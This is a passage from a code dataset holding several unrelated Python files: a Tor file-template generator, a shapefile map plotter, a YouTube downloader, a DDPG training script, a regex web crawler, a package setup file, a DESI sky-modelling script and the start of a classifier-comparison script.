Creates\n both files from templates, and adds them to the right include.am file.\n\n Example usage:\n\n % add_c_file.py ./src/feature/dirauth/ocelot.c\n\"\"\"\n\nimport os\nimport re\nimport time\n\ndef topdir_file(name):\n \"\"\"Strip opening \"src\" from a filename\"\"\"\n if name.startswith(\"src/\"):\n name = name[4:]\n return name\n\ndef guard_macro(name):\n \"\"\"Return the guard macro that should be used for the header file 'name'.\n \"\"\"\n td = topdir_file(name).replace(\".\", \"_\").replace(\"/\", \"_\").upper()\n return \"TOR_{}\".format(td)\n\ndef makeext(name, new_extension):\n \"\"\"Replace the extension for the file called 'name' with 'new_extension'.\n \"\"\"\n base = os.path.splitext(name)[0]\n return base + \".\" + new_extension\n\ndef instantiate_template(template, output_fname):\n \"\"\"\n Fill in a template with string using the fields that should be used\n for 'output_fname'.\n \"\"\"\n names = {\n # The relative location of the header file.\n 'header_path' : makeext(topdir_file(output_fname), \"h\"),\n # The relative location of the C file file.\n 'c_file_path' : makeext(topdir_file(output_fname), \"c\"),\n # The truncated name of the file.\n 'short_name' : os.path.basename(output_fname),\n # The current year, for the copyright notice\n 'this_year' : time.localtime().tm_year,\n # An appropriate guard macro, for the header.\n 'guard_macro' : guard_macro(output_fname),\n }\n\n return template.format(**names)\n\nHEADER_TEMPLATE = \"\"\"\\\n/* Copyright (c) 2001 Matej Pfajfar.\n * Copyright (c) 2001-2004, Roger Dingledine.\n * Copyright (c) 2004-2006, Roger Dingledine, Nick Mathewson.\n * Copyright (c) 2007-{this_year}, The Tor Project, Inc. */\n/* See LICENSE for licensing information */\n\n/**\n * @file {short_name}\n * @brief Header for {c_file_path}\n **/\n\n#ifndef {guard_macro}\n#define {guard_macro}\n\n#endif /* !defined({guard_macro}) */\n\"\"\"\n\nC_FILE_TEMPLATE = \"\"\"\\\n/* Copyright (c) 2001 Matej Pfajfar.\n * Copyright (c) 2001-2004, Roger Dingledine.\n * Copyright (c) 2004-2006, Roger Dingledine, Nick Mathewson.\n * Copyright (c) 2007-{this_year}, The Tor Project, Inc. */\n/* See LICENSE for licensing information */\n\n/**\n * @file {short_name}\n * @brief DOCDOC\n **/\n\n#include \"orconfig.h\"\n#include \"{header_path}\"\n\"\"\"\n\nclass AutomakeChunk:\n \"\"\"\n Represents part of an automake file. If it is decorated with\n an ADD_C_FILE comment, it has a \"kind\" based on what to add to it.\n Otherwise, it only has a bunch of lines in it.\n \"\"\"\n pat = re.compile(r'# ADD_C_FILE: INSERT (\\S*) HERE', re.I)\n\n def __init__(self):\n self.lines = []\n self.kind = \"\"\n\n def addLine(self, line):\n \"\"\"\n Insert a line into this chunk while parsing the automake file.\n \"\"\"\n m = self.pat.match(line)\n if m:\n if self.lines:\n raise ValueError(\"control line not preceded by a blank line\")\n self.kind = m.group(1)\n\n self.lines.append(line)\n if line.strip() == \"\":\n return True\n\n return False\n\n def insertMember(self, member):\n \"\"\"\n Add a new member to this chunk. 
Try to insert it in alphabetical\n order with matching indentation, but don't freak out too much if the\n source isn't consistent.\n\n Assumes that this chunk is of the form:\n FOOBAR = \\\n X \\\n Y \\\n Z\n \"\"\"\n prespace = \"\\t\"\n postspace = \"\\t\\t\"\n for lineno, line in enumerate(self.lines):\n m = re.match(r'(\\s+)(\\S+)(\\s+)\\\\', line)\n if not m:\n continue\n prespace, fname, postspace = m.groups()\n if fname > member:\n self.insert_before(lineno, member, prespace, postspace)\n return\n self.insert_at_end(member, prespace, postspace)\n\n def insert_before(self, lineno, member, prespace, postspace):\n self.lines.insert(lineno,\n \"{}{}{}\\\\\\n\".format(prespace, member, postspace))\n\n def insert_at_end(self, member, prespace, postspace):\n lastline = self.lines[-1]\n self.lines[-1] += '{}\\\\\\n'.format(postspace)\n self.lines.append(\"{}{}\\n\".format(prespace, member))\n\n def dump(self, f):\n \"\"\"Write all the lines in this chunk to the file 'f'.\"\"\"\n for line in self.lines:\n f.write(line)\n if not line.endswith(\"\\n\"):\n f.write(\"\\n\")\n\nclass ParsedAutomake:\n \"\"\"A sort-of-parsed automake file, with identified chunks into which\n headers and c files can be inserted.\n \"\"\"\n def __init__(self):\n self.chunks = []\n self.by_type = {}\n\n def addChunk(self, chunk):\n \"\"\"Add a newly parsed AutomakeChunk to this file.\"\"\"\n self.chunks.append(chunk)\n self.by_type[chunk.kind.lower()] = chunk\n\n def add_file(self, fname, kind):\n \"\"\"Insert a file of kind 'kind' to the appropriate section of this\n file. Return True if we added it.\n \"\"\"\n if kind.lower() in self.by_type:\n self.by_type[kind.lower()].insertMember(fname)\n return True\n else:\n return False\n\n def dump(self, f):\n \"\"\"Write this file into a file 'f'.\"\"\"\n for chunk in self.chunks:\n chunk.dump(f)\n\ndef get_include_am_location(fname):\n \"\"\"Find the right include.am file for introducing a new file. 
Return None\n if we can't guess one.\n\n Note that this function is imperfect because our include.am layout is\n not (yet) consistent.\n \"\"\"\n td = topdir_file(fname)\n m = re.match(r'^lib/([a-z0-9_]*)/', td)\n if m:\n return \"src/lib/{}/include.am\".format(m.group(1))\n\n if re.match(r'^(core|feature|app)/', td):\n return \"src/core/include.am\"\n\n if re.match(r'^test/', td):\n return \"src/test/include.am\"\n\n return None\n\ndef run(fn):\n \"\"\"\n Create a new C file and H file corresponding to the filename \"fn\", and\n add them to include.am.\n \"\"\"\n\n cf = makeext(fn, \"c\")\n hf = makeext(fn, \"h\")\n\n if os.path.exists(cf):\n print(\"{} already exists\".format(cf))\n return 1\n if os.path.exists(hf):\n print(\"{} already exists\".format(hf))\n return 1\n\n with open(cf, 'w') as f:\n f.write(instantiate_template(C_FILE_TEMPLATE, cf))\n\n with open(hf, 'w') as f:\n f.write(instantiate_template(HEADER_TEMPLATE, hf))\n\n iam = get_include_am_location(cf)\n if iam is None or not os.path.exists(iam):\n print(\"Made files successfully but couldn't identify include.am for {}\"\n .format(cf))\n return 1\n\n amfile = ParsedAutomake()\n cur_chunk = AutomakeChunk()\n with open(iam) as f:\n for line in f:\n if cur_chunk.addLine(line):\n amfile.addChunk(cur_chunk)\n cur_chunk = AutomakeChunk()\n amfile.addChunk(cur_chunk)\n\n amfile.add_file(cf, \"sources\")\n amfile.add_file(hf, \"headers\")\n\n with open(iam+\".tmp\", 'w') as f:\n amfile.dump(f)\n\n os.rename(iam+\".tmp\", iam)\n\nif __name__ == '__main__':\n import sys\n sys.exit(run(sys.argv[1]))\n","sub_path":"src/tor/scripts/maint/add_c_file.py","file_name":"add_c_file.py","file_ext":"py","file_size_in_byte":7281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"468484512","text":"\"\"\"Plot map of shapefile\n\"\"\"\n# pylint: disable=C0103\nimport argparse\nimport os\nfrom collections import defaultdict\n\nimport cartopy.crs as ccrs\nimport cartopy.io.shapereader as shpreader\nimport matplotlib.pyplot as plt\n\ndef plot_shapes(path):\n plt.figure(figsize=(6, 6), dpi=150)\n proj = ccrs.OSGB()\n ax = plt.axes(projection=proj)\n ax.outline_patch.set_visible(False)\n\n geoms = []\n for record in shpreader.Reader(path).records():\n geoms.append(record.geometry)\n\n ax.add_geometries(geoms, crs=proj, edgecolor='white', facecolor='#efefef')\n\n output_filename = os.path.join(\n os.getcwd(),\n 'map.png'\n )\n plt.savefig(output_filename)\n\n\ndef add_geoms_by_attribute(path, ax):\n \"\"\"Example adding geometries with categorical color\n \"\"\"\n # set up a dict to hold geometries keyed by our key\n geoms_by_key = defaultdict(list)\n # here we hardcode colors by key - could use other methods (interpolation, lookup...)\n colors_by_key = {\n 'a': '#ff0000',\n 'b': '#00ff00',\n 'c': '#0000ff'\n }\n\n # for each record, pick out our key's value from the record\n # and store the geometry in the relevant list under geoms_by_key\n for record in shpreader.Reader(path).records():\n key = record.attributes['key']\n geoms_by_key[key].append(record.geometry)\n\n # now we have all the geometries in lists for each value of our key\n # add them to the axis, using the relevant color as facecolor\n # (use the axes' own projection, since proj is not defined in this function)\n for key, geoms in geoms_by_key.items():\n color = colors_by_key[key]\n ax.add_geometries(geoms, crs=ax.projection, edgecolor='white', facecolor=color)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Plot a shapefile.')\n parser.add_argument('path', help='path to the shapefile to plot')\n args = parser.parse_args()\n\n 
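# plot the shapefile supplied on the command line\n 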
plot_shapes(args.path)","sub_path":"energy_demand/plotting/choropleth_mapping.py","file_name":"choropleth_mapping.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22852959","text":"# -*- coding:utf-8 -*-\r\n\r\n# Imports\r\nfrom pytube import YouTube, Playlist\r\nimport os\r\nimport shutil\r\nfrom pyfiglet import figlet_format as ff\r\nfrom random import randint\r\n\r\n\r\n# Function to Download a single video\r\ndef single(url):\r\n yt = YouTube(url)\r\n print(\"[-] Now Downloading %s\\n\" % yt.title)\r\n tell = yt.streams.all()\r\n print('[+] Id: 0\\t\\tAUDIO ONLY')\r\n for x in yt.streams.all():\r\n if str(x.resolution)!='None' and str(x.mime_type) == 'video/webm':\r\n print('[+] Id: '+str(x.itag), '\\tResolution: '+str(x.resolution)+'\\t'+str(x.filesize//(1024*1024))+' mb')\r\n\r\n tag = int(input('[+] Resolution Id: '))\r\n if tag!=0:\r\n try:\r\n try:shutil.rmtree('videok9')\r\n except:pass\r\n os.mkdir('videok9')\r\n print('[-] Video Download Started: ',yt.title)\r\n yt.streams.get_by_itag(tag).download('videok9')\r\n vname = os.listdir('videok9')[0]\r\n except Exception as e:print('[-]', e)\r\n\r\n l=[]\r\n for x in yt.streams.all():\r\n if str(x.mime_type) in ['audio/webm', 'audio/mp4']:\r\n l.append((str(x.itag), str(x.abr), str(x.mime_type)[6:], str(x.audio_codec), x.default_filename))\r\n for x in l:\r\n if x[3] in ['vorbis', 'mp4a.40.2']:\r\n atag = int(x[0])\r\n aname = x[-1]\r\n if x[3] == 'vorbis':\r\n break\r\n else:\r\n atag = int(l[0][0])\r\n\r\n print(\"[-] Audio Download Started.\\n\")\r\n yt.streams.get_by_itag(atag).download()\r\n\r\n if tag!=0:\r\n try:\r\n print(\"[-] Merging using ffmpeg.\\n\")\r\n os.system(\"ffmpeg -i \\\"videok9/\"+vname+\"\\\" -i \\\"\"+aname+\"\\\" -ab 192k -r 27 -shortest \\\"\"+vname.split('.')[0]+'_.mp4'\"\\\"\")\r\n shutil.rmtree('videok9')\r\n os.remove(aname)\r\n print(' [S][U][C][C][E][S][S] ')\r\n except Exception as e:\r\n print(e)\r\n else:\r\n output = input(\"[+] Transcode in mp3 from webm/mp4a?: Press 1 else Enter \")\r\n if output=='1':\r\n os.system(\"ffmpeg -i \\\"\"+aname+\"\\\" -ab 192k \\\"\"+aname.split('.')[0]+\"_.mp3\"+\"\\\"\")\r\n os.remove(aname)\r\n print(' [S][U][C][C][E][S][S] ')\r\n\r\n\r\n# Playlist Download\r\ndef playlist(url):\r\n pl = Playlist(url)\r\n pl.populate_video_urls() # We need to populate it otherwise video_urls will give an empty list.\r\n videos = pl.video_urls\r\n #print(videos)\r\n #print('second')\r\n tag = int(input(\"\"\"\r\n >> Enter 0 to download Audio only.\r\n >> Enter Video-Resolution ID to be downloaded.\r\n >> Ex. '247' without quotes for 720p res.\r\n\r\n \r\n Available Resolutions\\n:\r\n [+] ID: 248 1080p\r\n [+] ID: 247 720p\r\n [+] ID: 244 480p\r\n [+] ID: 243 360p\r\n [+] ID: 242 240p\r\n [+] ID: 278 144p\\n\r\n \"\"\"))\r\n print('>>> Script executed successfully.')\r\n print('>>> Give a star if it helps you. It will encourage me :)')\r\n print('>>> ffmpeg console will appear, ignore it. 
Do not close or else merge will fail.')\r\n if tag != 0:\r\n for iurl in videos:\r\n yt = YouTube(iurl)\r\n try:\r\n try:shutil.rmtree('videok9')\r\n except:pass\r\n os.mkdir('videok9')\r\n yt.streams.get_by_itag(tag).download('videok9')\r\n print(\"[-] Success: \", yt.title)\r\n vname = os.listdir('videok9')[0]\r\n make_needed = True\r\n except Exception as e:\r\n make_needed = False\r\n if str(e) == \"'NoneType' object has no attribute 'download'\":\r\n print(\"[*] Format decreased for: \",yt.title)\r\n try:\r\n yt.streams.filter(progressive=True).order_by('resolution').desc().first().download()\r\n print(\"[-] success: \", yt.title)\r\n except:\r\n print('[*]', yt.title, ' is skipped entirely. Please download it from the command line.')\r\n \r\n if make_needed: #not needed means audio and video are present already.\r\n l=[]\r\n for x in yt.streams.all():\r\n if str(x.mime_type) in ['audio/webm', 'audio/mp4']:\r\n l.append((str(x.itag), str(x.abr), str(x.mime_type)[6:], str(x.audio_codec), x.default_filename))\r\n for x in l:\r\n if x[3] in ['vorbis', 'mp4a.40.2']:\r\n atag = int(x[0])\r\n aname = x[-1]\r\n if x[3] == 'vorbis':\r\n break\r\n else:\r\n atag = int(l[0][0])\r\n\r\n yt.streams.get_by_itag(atag).download()\r\n \r\n try:\r\n os.system(\"ffmpeg -i \\\"videok9/\"+vname+\"\\\" -i \\\"\"+aname+\"\\\" -ab 160k -r 27 -shortest \\\"\"+vname.split('.')[0]+'_.mp4'\"\\\"\")\r\n shutil.rmtree('videok9')\r\n os.remove(aname)\r\n print(\" [S][U][C][C][E][S][S] \")\r\n except Exception as e:\r\n print('[*]', e)\r\n print(\"[*] Make sure ffmpeg is added to your PATH environment variable.\")\r\n else:pass\r\n \r\n elif tag == 0:\r\n output = input(\"[+] Transcode in mp3 from webm/mp4a?: Press 1 else Enter \")\r\n for iurl in videos:\r\n # create the YouTube object before reading its streams\r\n yt = YouTube(iurl)\r\n aname = yt.streams.filter(only_audio=True).first().default_filename\r\n print('[-] success: ',yt.title)\r\n yt.streams.filter(only_audio=True).first().download()\r\n if output=='1':\r\n os.system(\"ffmpeg -i \\\"\"+aname+\"\\\" -ab 160k \\\"\"+aname.split('.')[0]+\"_.mp3\"+\"\\\"\")\r\n os.remove(aname)\r\n else:\r\n print('[*] Enter correct choice like 243')\r\n playlist(url)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Wanna Be Cool\r\n print(ff('YToff' ,font=['block', 'isometric1', 'isometric2'][randint(0,2)]))\r\n\r\n url = input('[+] Url for Video/Playlist: ')\r\n\r\n # Decide if playlist or single track\r\n try:\r\n if 'https://www.youtube.com/playlist?' 
in url:\r\n playlist(url)\r\n else:\r\n single(url)\r\n except Exception as e:\r\n print(e, '\\n[*] Give YouTube Video or Playlist link.')\r\n\r\n input(' [F][U][L][L][][S][U][C][C][E][S][S] ')\r\n\r\n","sub_path":"YToff.py","file_name":"YToff.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"366920491","text":"\"\"\" main file to train agent in the env \"\"\"\nimport argparse\nimport sys\nimport os\nimport gym\nimport time\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom gym.spaces.box import Box\nfrom gym.spaces.discrete import Discrete\nfrom collections import deque\nfrom unityagents import UnityEnvironment\nfrom baselines import bench\nfrom baselines.common.atari_wrappers import make_atari, wrap_deepmind\nfrom baselines.common.atari_wrappers import FrameStack as FrameStack_\nfrom baselines.common.vec_env.subproc_vec_env import SubprocVecEnv, VecEnv\n\nfrom envs import Task\nfrom envs import OrnsteinUhlenbeckProcess\nfrom envs import LinearSchedule\nfrom config import Config\nfrom ac_model import DeterministicActorCriticNet\nfrom memory import Replay\nfrom ddpg_agent import DDPGAgent\nfrom ddpg_agent import FCBody\nfrom ddpg_agent import TwoLayerFCBodyWithAction\n\n\n\ndef main(arg):\n \"\"\" Train the DDPG agent in the Reacher environment.\n\n Args:\n param1: (args)\n \n \"\"\"\n env = UnityEnvironment(file_name='Reacher_Linux/Reacher.x86_64', no_graphics=True)\n \n # get the default brain\n brain_name = env.brain_names[0]\n brain = env.brains[brain_name]\n\n # reset the environment\n env_info = env.reset(train_mode=True)[brain_name]\n\n # number of agents\n num_agents = len(env_info.agents)\n print('Number of agents:', num_agents)\n states = env_info.vector_observations\n\n print('Size of each action:', brain.vector_action_space_size)\n print(states.shape[1])\n\n config = Config()\n config.state_dim = states.shape[1]\n config.action_dim = brain.vector_action_space_size\n\n\n config = set_config(config, arg) \n agent = DDPGAgent(config)\n agent.random_process = config.random_process_fn()\n agent_name = agent.__class__.__name__\n t0 = time.time()\n n_episodes = arg.n_episodes\n train_every = arg.train_every\n repeat_learn = arg.repeat_learning\n total_steps = 0\n all_agents = [[] for x in range(num_agents)] \n # one separate deque per agent; sharing a single deque would alias the same window\n agents_rewards = [deque(maxlen=100) for x in range(num_agents)] # last 100 scores\n for i_episode in range(1, n_episodes+1):\n scores = np.zeros(num_agents) \n env_info = env.reset(train_mode=True)[brain_name]\n states = env_info.vector_observations # get the current state (for each agent)\n agent.random_process.reset_states()\n while True:\n total_steps +=1\n actions = []\n for state in states:\n action = (agent.network(state))\n action = action.cpu().detach().numpy()\n action += agent.random_process.sample()\n actions.append(action)\n env_info = env.step(actions)[brain_name]\n next_states = env_info.vector_observations # get next state (for each agent)\n rewards = env_info.rewards # get reward (for each agent)\n dones = env_info.local_done # see if episode finished\n scores += env_info.rewards # update the score (for each agent)\n for state, action, reward, next_state, done in zip(states, actions, rewards, next_states, dones):\n agent.replay.feed([state, action, reward, next_state, int(done)])\n states = next_states\n if total_steps % train_every == 0:\n for _ in 
range(repeat_learn):\n agent.learn()\n if np.any(dones):\n for score, one_agent, agent_reward in zip(scores, all_agents, agents_rewards):\n one_agent.append(score)\n agent_reward.append(score)\n print('\\rEpisode {}\\t Average Score all: {:.2f} , Score: {:.2f} Time: {:.2f}'.format(i_episode,\n np.mean([np.mean(r) for r in agents_rewards]),\n np.mean(scores), time.time() - t0))\n break\n if np.mean(agents_rewards[0]) >= 30:\n print('total steps: ', total_steps)\n agent.save('smart')\n print(\"save smart agent\")\n return all_agents\n\n\ndef save_and_plot(score, model_num):\n \"\"\" saves the result of the training into the given file\n Args:\n param1 (list): score\n param2 (int): model number used in the output filename\n \"\"\"\n fig = plt.figure()\n fig.add_subplot(111)\n plt.plot(np.arange(len(score)), score)\n plt.ylabel('Score')\n plt.xlabel('Episode #')\n plt.savefig('scores.png')\n # plt.show()\n\n df = pd.DataFrame({'episode':np.arange(len(score)), 'score':score})\n df.set_index('episode', inplace=True)\n df.to_csv('scores_{}.csv'.format(model_num))\n\n\n\ndef set_config(config, args):\n \"\"\" \n Args:\n param1: (args): args\n Return config\n \"\"\"\n config.max_steps = int(1e6)\n config.eval_interval = int(1e4)\n config.eval_episodes = 20\n config.save_interval = 10000\n config.discount = args.discount\n config.network_fn = lambda: DeterministicActorCriticNet(\n config.state_dim, config.action_dim,\n actor_body=FCBody(config.state_dim, (args.hidden_size1,\n args.hidden_size2), gate=F.relu),\n critic_body=TwoLayerFCBodyWithAction(config.state_dim,\n config.action_dim, (args.hidden_size1, args.hidden_size2), gate=F.relu),\n actor_opt_fn=lambda params: torch.optim.Adam(params, lr=args.lr),\n critic_opt_fn=lambda params: torch.optim.Adam(params, lr=args.lr))\n config.replay_fn = lambda: Replay(memory_size=args.memory_capacity,\n batch_size=args.batch_size)\n config.random_process_fn = lambda: OrnsteinUhlenbeckProcess(size=(config.action_dim, ), std=LinearSchedule(0.2))\n config.min_memory_size = 10000\n config.target_network_mix = 1e-3\n config.DEVICE = 'cuda:0'\n \n return config\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='DDPG')\n parser.add_argument('--hidden-size1', type=int, default=400, metavar='SIZE', help='Network hidden size')\n parser.add_argument('--hidden-size2', type=int, default=300, metavar='SIZE', help='Network hidden size')\n parser.add_argument('--memory-capacity', type=int, default=int(1e6), metavar='CAPACITY', help='Experience replay memory capacity')\n parser.add_argument('--lr', type=float, default=2e-4, metavar='mue', help='Learning rate')\n parser.add_argument('--adam-eps', type=float, default=1e-8, metavar='eps', help='Adam epsilon')\n parser.add_argument('--batch-size', type=int, default=64, metavar='SIZE', help='Batch size')\n parser.add_argument('--train_every', type=int, default=20)\n parser.add_argument('--discount', type=float, default=0.99, metavar='gamma', help='Discount factor') \n parser.add_argument('--n_episodes', type=int, default=500)\n parser.add_argument('--repeat_learning', type=int, default=10)\n parser.add_argument('--model_num', default=0)\n arg = parser.parse_args()\n s = main(arg)\n save_and_plot(s, arg.model_num)\n","sub_path":"20Agents/ddpg_main.py","file_name":"ddpg_main.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"419170852","text":"#!
usr/bin/python3\n\n# This is meant to be a rudimentary crawler using regular expressions.\n# Scrapy is a great tool but I may find it easier to target javascript elements using something like this.\n# Extend depth layers by calling the generic_crawl function with the last regex results as arg.\n\n\nimport urllib.request\nimport re\nimport sys\nfrom threading import Thread\n\n\nORIGIN_URL = sys.argv[1]\n\n\ndef crawl_faster(bot):\n threadx = Thread(target=bot)\n threadx.setDaemon(True)\n threadx.start()\n return threadx\n\n\nSAVE_SCRAPED = {} # this will be global save file.\ndef save_to_file(scraped_data):\n if len(sys.argv) > 3 and sys.argv[2] == \"save\": # guard against an IndexError when the optional args are missing\n with open(sys.argv[3],\"a\") as savefile:\n savefile.write(scraped_data)\n\n\nclass Crawler():\n def __init__(self):\n self.fake_header = {}\n self.fake_header['User-Agent'] = \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/66.0.3359.181 Chrome/66.0.3359.181 Safari/537.36\"\n self.fake_header['Accept-Language'] = \"en-US,en;q=0.9\"\n self.fake_header['Cache-Control'] = \"no-cache\"\n\n def start(self, *optional_url):\n if optional_url:\n self.req = urllib.request.Request(url='https://'+optional_url[0], headers=self.fake_header)\n else:\n self.req = urllib.request.Request(url=sys.argv[1],headers=self.fake_header)\n self.start_page = urllib.request.urlopen(self.req)\n self.data = self.start_page.read()\n\n def find(self, regex_pattern):\n self.result = re.findall(regex_pattern, self.data.decode())\n return self.result\n\n\nbot = Crawler()\nbot.start()\ninitial_regex_input = input(\"Initial regex pattern.\\nPress enter to skip, default pattern searches for https://\\n\")\nif len(initial_regex_input) == 0:\n results = bot.find(r\"href=\\\"https://(.*?)\\\"\")\nelse:\n results = bot.find(initial_regex_input)\n\nsecondary_pages_scrape = {}\niframe_links = {} # make tidy catalogue, use json module to save as json.\n\ndef generic_crawl(initial_crawl_data):\n user_re = input(\"Insert secondary page regex grapple.\\nUseful example: href=\\\\\\\"(.*)\\\\\\\"\\n\")\n for x in initial_crawl_data: # this is to filter irrelevant links, this is reusable.\n if len(re.findall(r\"(google|blogger|youtube|facebook|disqus|\\.css|\\.js).*?\",x)) == 0:\n gruntbot = Crawler()\n try:\n gruntbot.start(x)\n print(\"\\n PAGE %s\\n\" % x)\n secondary_pages_scrape[x] = gruntbot.find(user_re)\n print(secondary_pages_scrape[x], \"\\nEND PAGE %s\\n\\n\" % x)\n except Exception as e:\n print('URL ERROR @gruntbot: ',e)\n continue\n else:\n continue\n\ndef gruntbot_crawl():\n generic_crawl(results)\n\n\n# pass the callable itself: gruntbot_crawl() would run synchronously and hand Thread a None target\nworker = crawl_faster(gruntbot_crawl)\nworker.join() # wait for the crawl to finish before printing its results\n\nfor each_list in secondary_pages_scrape: #videos was part of my regex ...\n for list_page in secondary_pages_scrape[each_list]:\n print(\"\\n\",ORIGIN_URL+\"/videos/\"+list_page)\n","sub_path":"crawl/litewolfcrawler.py","file_name":"litewolfcrawler.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"433721729","text":"# coding=utf-8\n\"\"\"\nIdealista API setup\n\"\"\"\n__copyright__ = 'Copyright 2016, DNest'\n\nfrom setuptools import setup, find_packages\n\n# Dynamically calculate the version based on idealista.VERSION.\nVERSION = __import__('idealista').get_version()\n\n\nsetup(\n name='idealista-api-python',\n version=VERSION,\n url='https://bitbucket.org/abalt/idealista-api-python',\n author='DNest',\n author_email='admin@dnestagency.com',\n description=(\n \"Upload properties to Idealista using IDEALISTA 
API.\"),\n long_description=open('README.rst').read(),\n keywords=\"Idealista, Properties, Rent, Sale\",\n license=open('LICENSE').read(),\n packages=find_packages(),\n include_package_data=True,\n install_requires=[],\n download_url='https://bitbucket.org/abalt/idealista-api-python/get/0.1.3.zip',\n # See http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Other/Nonlisted Topic'],\n)\n","sub_path":"pypi_install_script/idealista-api-python-0.1.3.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"504434057","text":"#!/usr/bin/env python\n#\n# See top-level LICENSE file for Copyright information\n#\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis script computes the fiber flat field correction from a DESI continuum lamp frame.\n\"\"\"\n\nfrom desispec.io import read_frame\nfrom desispec.io import read_fibermap\nfrom desispec.io import read_fiberflat\nfrom desispec.io import write_sky\nfrom desispec.fiberflat import apply_fiberflat\nfrom desispec.sky import compute_sky\nfrom desispec.log import get_logger\nimport argparse\nimport numpy as np\nimport sys\n\ndef main() :\n\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--infile', type = str, default = None, required=True,\n help = 'path of DESI exposure frame fits file')\n parser.add_argument('--fibermap', type = str, default = None, required=True,\n help = 'path of DESI exposure frame fits file')\n parser.add_argument('--fiberflat', type = str, default = None, required=True,\n help = 'path of DESI fiberflat fits file')\n parser.add_argument('--outfile', type = str, default = None, required=True,\n help = 'path of DESI sky fits file')\n\n\n args = parser.parse_args()\n log=get_logger()\n\n log.info(\"starting\")\n\n # read exposure to load data and get range of spectra\n frame = read_frame(args.infile)\n specmin=frame.header[\"SPECMIN\"]\n specmax=frame.header[\"SPECMAX\"]\n\n # read fibermap to locate sky fibers\n fibermap = read_fibermap(args.fibermap)\n selection=np.where((fibermap[\"OBJTYPE\"]==\"SKY\")&(fibermap[\"FIBER\"]>=specmin)&(fibermap[\"FIBER\"]<=specmax))[0]\n if selection.size == 0 :\n log.error(\"no sky fiber in fibermap %s\"%args.fibermap)\n sys.exit(12)\n\n # read fiberflat\n fiberflat = read_fiberflat(args.fiberflat)\n\n # apply fiberflat to sky fibers\n apply_fiberflat(frame, fiberflat)\n\n # compute sky model\n skymodel = compute_sky(frame, fibermap)\n\n # write result\n write_sky(args.outfile, skymodel, frame.header)\n\n log.info(\"successfully wrote %s\"%args.outfile)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bin/desi_compute_sky.py","file_name":"desi_compute_sky.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"349848912","text":"__author__ = 'jinghe'\n\nimport numpy as np\nfrom sklearn import metrics\nimport pickle\nimport Feature_transformation as feature_transform\nimport Experiments\nfrom sklearn.svm import SVC\nfrom sklearn import neighbors\nfrom sklearn.lda import LDA\nfrom 
sklearn.ensemble import RandomForestClassifier\nfrom sklearn.naive_bayes import MultinomialNB, GaussianNB\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom scipy import stats\nimport pandas as pd\nimport statsmodels.formula.api as smf\nimport copy\nimport operator\nimport random\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nimport collections\nimport csv\n\ndef otherMetrics(mat):\n TP = mat[0, 0] \n FN = mat[0, 1]\n FP = mat[1, 0]\n TN = mat[1, 1]\n acc = (TP + TN) / (TP + FP + FN +TN)\n precision = TP / (TP + FP)\n recall = TP / (TP + FN)\n f1 = 2 * precision * recall / (precision + recall)\n precision_c = TN / (TN + FN)\n recall_c = TN / (TN + FP)\n f1_c = 2 * precision_c * recall_c / (precision_c + recall_c)\n return [acc, precision, recall, f1, precision_c, recall_c, f1_c]\n \n \ndef prediction(clf, X_train, y_train, X_test, y_test):\n clf.fit(X_train, y_train)\n predicted = clf.predict(X_test)\n results = metrics.classification_report(y_test, predicted)\n confusion_mat = metrics.confusion_matrix(y_test, predicted) \n others = otherMetrics(confusion_mat)\n return results, others#, clf.coef_\n\n\ndef colNames(all_meds, all_procs):\n k1 = list(dict.fromkeys(all_meds).keys())\n k2 = list(dict.fromkeys(all_procs).keys())\n k = k1 + k2\n l = len(k)\n i = 0\n d_names = {}\n while i < l:\n d_names[i] = k[i]\n i += 1\n return d_names\n\n\ndef prediction_experiments(X_train, y_train, X_test, y_test, s, c):\n# X_train, X_test, y_train, y_test = cross_validation.train_test_split(data, response, test_size=0.25, random_state=0)\n \n clf_lr = LogisticRegression(penalty='l1', C=c)\n results_lr = prediction(clf_lr, X_train, y_train, X_test, y_test)\n \n \n# clf_rf = RandomForestClassifier(n_estimators=20, criterion='entropy')\n# results_rf = prediction(clf_rf, X_train, y_train, X_test, y_test)\n# \n# clf_lda = LDA()\n# results_lda = prediction(clf_lda, X_train, y_train, X_test, y_test)\n#\n# clf_nb = MultinomialNB()\n# results_nb = prediction(clf_nb, X_train, y_train, X_test, y_test)\n# \n# nneighbors = 5\n# clf_knn1 = neighbors.KNeighborsClassifier(nneighbors, weights='uniform')\n# results_knn1 = prediction(clf_knn1, X_train, y_train, X_test, y_test)\n#\n# clf_knn2 = neighbors.KNeighborsClassifier(nneighbors, 